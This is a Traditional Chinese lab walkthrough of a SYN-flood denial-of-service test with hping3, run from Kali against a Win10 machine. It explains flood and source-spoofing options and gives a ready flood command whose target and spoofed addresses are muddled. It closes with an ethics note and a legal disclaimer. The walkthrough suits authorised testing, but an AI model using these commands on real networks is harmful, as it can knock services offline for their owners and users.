利用大量封包,藉以消耗受害者的網路頻寬與系統資源,導致網路癱瘓,無法提供正常的服務。
任務目標
根據《線上零售效能現狀報告》指出,網站載入時間延遲100毫秒,就會損及7%轉換率,您的目標是針對甲方的電商網站進行一定流量攻擊,以提出強化該網站效能的方案。
使用工具
hping3
作者:antirez
載點:https://github.com/antirez/hping 或 http://www.hping.org/
簡介:hping3 作為網路工具,可自定義TCP/IP封包並顯示回應,用於網路、連接埠、協定、作業系統、服務類型掃描。
攻擊環境
OS:Kali 2021.04
滲透目標:Win10
進行演練
Step 1. 下載 hping3,結果kali自帶了。
apt-get install hping3
Step 2. 查看 hping3 參數設定,說明如下:
- -c:發送封包的個數
- -d:每個封包的大小
- -S:發送SYN封包
- -w:TCP window大小
- -p:目標埠,你可以指定任意埠
- –flood:儘可能快的發送封包
- –rand-source:隱藏來源位置(隨機產生)
man hping3
Step 3. 使用hping3 工具進行 DoS 攻擊,其中目標網址為 http://192.168.100.112/shop.html 。
sudo hping3 -S 192.168.238.128 -a 192.168.100.112 -p 80 --flood- SYN flooding:SYN洪水,一種阻斷服務攻擊
- Ping of Death:死亡之Ping,惡意的ping指令
Step 4. 觀察目標網站的封包變化,其中圖表顯示目標接收到大量的封包。
討論
儘管hping3的初衷是作為安全工具,卻有可能被有心人士用於非法行為,期望使用這套工具的白帽駭客們,在強化與審核自家系統能否承受外來攻擊之時,也不忘初心,守護永恆的系統。
免責聲明
未經事先雙方同意,使用 hping3 攻擊目標是非法的。請遵守當地法律規範。開發者與本作者對此工具不承擔任何責任,也不對任何濫用或損壞負責。
